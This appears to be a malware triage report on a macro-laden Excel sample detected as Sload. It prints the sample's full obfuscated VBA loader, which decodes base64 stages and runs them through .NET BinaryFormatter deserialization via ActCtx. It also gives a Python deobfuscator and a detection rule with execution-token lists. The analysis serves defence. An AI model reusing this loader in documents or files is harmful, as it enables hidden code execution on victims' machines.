MALICIOUS
Risk Score: 222
Heuristics: 5
- ClamAV: Xls.Malware.Sload-7135989-0 [critical] (CLAMAV_DETECTION)
  ClamAV detected this file as malware: Xls.Malware.Sload-7135989-0
- VBA project inside OOXML [medium] (OOXML_VBA, 2 related findings)
  Document contains a VBA project (VBA macros present).
- CreateObject call [high] (OLE_VBA_CREATEOBJ)
  Matched line in script:
  Set kxdxtdqme = CreateObject(wrzrlpxsknyk("4d73786d6c322e444f4d446f") & wrzrlpxsknyk("63756d656e742e332e30"))
  The ProgID passed to CreateObject is hex-encoded and rebuilt at run time by wrzrlpxsknyk(), so a plain string search of the source for the target object name will not find it; only the CreateObject token itself is visible.
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
  Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  Caveat for this sample: the decoded source in macros.bas (below) defines no Auto_Open/Workbook_Open-style procedure at all, so the entry point this rule matched exists only in the compiled p-code stream, not in the recovered source (the pattern seen when p-code and source disagree, e.g. a stomped or stale module). Confirm the real entry point from the p-code (for example with pcodedmp) before relying on the source listing.
- Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3141 bytes | f4bcd61027a329ddbe68a46046313e523f93b4ba978600616806664aa81d50c2 |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 37888 bytes | 1baf4da25dea313e1570fcb885127655f209d12a0b5cf9a836956d5bcda166ae |

macros.bas: preview script (first 1,000 lines of the extracted script)

```vb
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function awwhcduwipshbqjnrt(ByVal enc)
Dim kxdxtdqme, zskjrflyfrhqvyz
Set kxdxtdqme = CreateObject(wrzrlpxsknyk("4d73786d6c322e444f4d446f") & wrzrlpxsknyk("63756d656e742e332e30"))
Set zskjrflyfrhqvyz = kxdxtdqme.CreateElement(wrzrlpxsknyk("62617365") & wrzrlpxsknyk("3634"))
zskjrflyfrhqvyz.DataType = wrzrlpxsknyk("62696e") & wrzrlpxsknyk("2e626173653634")
zskjrflyfrhqvyz.Text = enc
awwhcduwipshbqjnrt = zskjrflyfrhqvyz.nodeTypedValue
Set zskjrflyfrhqvyz = Nothing
Set kxdxtdqme = Nothing
End Function
Function muiaifrzxirnam()
Dim stage_1, stage_2
stage_1 = UserForm1.TextBox1.Text
stage_2 = UserForm1.TextBox2.Text
Dim enmdriuzkq As Object, wmnnwkuvwyaptjgofz As Object
Set uvzvjxjgoaqpyybepqg = CreateObject(wrzrlpxsknyk("4d6963726f736f66742e5769") & wrzrlpxsknyk("6e646f77732e416374437478"))
uvzvjxjgoaqpyybepqg.ManifestText = manifest
Set enmdriuzkq = uvzvjxjgoaqpyybepqg.CreateObject(wrzrlpxsknyk("53797374656d2e494f2e4d656d6f7279") & wrzrlpxsknyk("53747265616d"))
Set wmnnwkuvwyaptjgofz = uvzvjxjgoaqpyybepqg.CreateObject(wrzrlpxsknyk("5379737465") & wrzrlpxsknyk("6d2e52756e74696d652e53657269616c697a6174696f6e2e466f726d6174746572732e42696e6172792e42696e617279466f726d6174746572"))
Dim Decstage_1
Decstage_1 = awwhcduwipshbqjnrt(stage_1)
For Each i In Decstage_1
enmdriuzkq.WriteByte i
Next i
On Error Resume Next
enmdriuzkq.Position = 0
Dim sfluskmgogpwwd As Object
Set sfluskmgogpwwd = wmnnwkuvwyaptjgofz.Deserialize_2(enmdriuzkq)
If Err.Number <> 0 Then
Dim tcmbqwmbxzhhahf As Object
Set tcmbqwmbxzhhahf = uvzvjxjgoaqpyybepqg.CreateObject(wrzrlpxsknyk("53797374656d2e494f2e4d656d6f72") & wrzrlpxsknyk("7953747265616d"))
Dim Decstage_2
Decstage_2 = awwhcduwipshbqjnrt(stage_2)
For Each j In Decstage_2
tcmbqwmbxzhhahf.WriteByte j
Next j
tcmbqwmbxzhhahf.Position = 0
Dim jbbdqbps As Object
Set jbbdqbps = wmnnwkuvwyaptjgofz.Deserialize_2(tcmbqwmbxzhhahf)
End If
End Function
Private Function wrzrlpxsknyk(ByVal lxegrhweevcs As String) As String
Dim lyrlohdxdjob As Long
For lyrlohdxdjob = 1 To Len(lxegrhweevcs) Step 2
wrzrlpxsknyk = wrzrlpxsknyk & Chr$(Val("&H" & Mid$(lxegrhweevcs, lyrlohdxdjob, 2)))
Next lyrlohdxdjob
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{1C57C88E-D6F0-470A-8248-5141820511FF}{DE0C0882-95D5-46F2-8B14-530C2A97D671}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```

Two things in this listing are worth noting before triage continues. The variable `manifest` assigned to `ManifestText` is not defined anywhere in the recovered source, so the activation-context manifest that tells Microsoft.Windows.ActCtx which assembly and classes to instantiate was not recovered here. And the two payload stages are read from UserForm1.TextBox1 and UserForm1.TextBox2 rather than from the module source, so they are absent from this preview and have to be dumped from the UserForm storage inside vbaProject_00.bin.

vbaProject_00.bin: detection
ClamAV: Xls.Malware.Sload-7135989-0
Obfuscation or payload: likely. Carved artifact contains 2 long base64-like blob(s), consistent with the two text-box values that muiaifrzxirnam() base64-decodes as stage_1 and stage_2.
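As an added worked example (not part of this report and not code from the sample), the script below ports the sample's wrzrlpxsknyk() hex decoder to Python, resolves every `wrzrlpxsknyk("..") & wrzrlpxsknyk("..")` chain in an excerpt of the macros.bas preview above, and re-implements the OLE_VBA_PCODE_AUTOEXEC_EXEC token-pairing rule to show why that rule has to look at the p-code: the recovered source contains CreateObject but no entry point, so the rule stays silent on it and only fires on a stream that carries both tokens. Decoding resolves the obfuscated ProgIDs to Msxml2.DOMDocument.3.0 (used with a bin.base64 element as a base64 decoder), Microsoft.Windows.ActCtx (which instantiates System.IO.MemoryStream and System.Runtime.Serialization.Formatters.Binary.BinaryFormatter from a manifest), after which the macro hands the decoded blobs to BinaryFormatter.Deserialize_2. The MACRO_SRC excerpt and the stand-in "p-code stream" are constructed from the report text; the function names and the case-insensitive substring matching are my choices, not the analyzer's implementation.

```python
import re

# Constructed excerpt of the macros.bas preview from this report (the lines that
# build strings through wrzrlpxsknyk), embedded so the script runs offline.
MACRO_SRC = r'''
Set kxdxtdqme = CreateObject(wrzrlpxsknyk("4d73786d6c322e444f4d446f") & wrzrlpxsknyk("63756d656e742e332e30"))
Set zskjrflyfrhqvyz = kxdxtdqme.CreateElement(wrzrlpxsknyk("62617365") & wrzrlpxsknyk("3634"))
zskjrflyfrhqvyz.DataType = wrzrlpxsknyk("62696e") & wrzrlpxsknyk("2e626173653634")
Set uvzvjxjgoaqpyybepqg = CreateObject(wrzrlpxsknyk("4d6963726f736f66742e5769") & wrzrlpxsknyk("6e646f77732e416374437478"))
Set enmdriuzkq = uvzvjxjgoaqpyybepqg.CreateObject(wrzrlpxsknyk("53797374656d2e494f2e4d656d6f7279") & wrzrlpxsknyk("53747265616d"))
Set wmnnwkuvwyaptjgofz = uvzvjxjgoaqpyybepqg.CreateObject(wrzrlpxsknyk("5379737465") & wrzrlpxsknyk("6d2e52756e74696d652e53657269616c697a6174696f6e2e466f726d6174746572732e42696e6172792e42696e617279466f726d6174746572"))
Set tcmbqwmbxzhhahf = uvzvjxjgoaqpyybepqg.CreateObject(wrzrlpxsknyk("53797374656d2e494f2e4d656d6f72") & wrzrlpxsknyk("7953747265616d"))
Set sfluskmgogpwwd = wmnnwkuvwyaptjgofz.Deserialize_2(enmdriuzkq)
'''

# One wrzrlpxsknyk("<hex>") call, and a chain of such calls joined by VBA's & operator.
HEX_CALL = re.compile(r'wrzrlpxsknyk\("([0-9A-Fa-f]*)"\)')
CHAIN = re.compile(r'wrzrlpxsknyk\("[0-9A-Fa-f]*"\)(?:\s*&\s*wrzrlpxsknyk\("[0-9A-Fa-f]*"\))*')


def vba_hex_decode(hexstr: str) -> str:
    """Port of the sample's wrzrlpxsknyk(): Mid$(s, i, 2) -> Val("&H..") -> Chr$.
    Like the VBA loop (Step 2 up to Len), an odd trailing digit is decoded on its own."""
    return "".join(chr(int(hexstr[i:i + 2], 16)) for i in range(0, len(hexstr), 2))


def _decode_chain(chain: str) -> str:
    return "".join(vba_hex_decode(h) for h in HEX_CALL.findall(chain))


def recovered_strings(src: str) -> list[str]:
    """Every concatenated wrzrlpxsknyk() chain in src, decoded, in source order."""
    return [_decode_chain(m.group(0)) for m in CHAIN.finditer(src)]


def deobfuscate(src: str) -> str:
    """Rewrite each chain as a plain VBA string literal so the macro reads as intended."""
    return CHAIN.sub(lambda m: '"' + _decode_chain(m.group(0)) + '"', src)


# Token lists copied from the OLE_VBA_PCODE_AUTOEXEC_EXEC description in the report.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def autoexec_exec_pairing(stream: bytes) -> dict:
    """Re-implementation of the pairing rule: fires only when an auto-exec entry point
    AND an execution token both occur in the same stream. This is a case-insensitive
    substring check over the raw bytes (my simplification; VBA identifiers are
    case-insensitive, and p-code streams keep identifiers as readable text)."""
    text = stream.decode("latin-1").lower()
    auto = [t for t in AUTOEXEC_TOKENS if t.lower() in text]
    exe = [t for t in EXEC_TOKENS if t.lower() in text]
    return {"fires": bool(auto) and bool(exe), "autoexec": auto, "exec": exe}


if __name__ == "__main__":
    for s in recovered_strings(MACRO_SRC):
        print(s)
    print(deobfuscate(MACRO_SRC))
    # Recovered source: exec token present, no entry point, so the rule does not fire.
    print(autoexec_exec_pairing(deobfuscate(MACRO_SRC).encode()))
    # Constructed stand-in for a compiled stream that does carry an entry point.
    print(autoexec_exec_pairing(b"\x00Workbook_Open\x00CreateObject\x00Msxml2.DOMDocument.3.0"))
```

On a real case, feed deobfuscate() the full macros.bas that olevba produced and run autoexec_exec_pairing() over each module and cache stream from vbaProject.bin separately, since the rule is defined per stream and a hit in one stream says nothing about another.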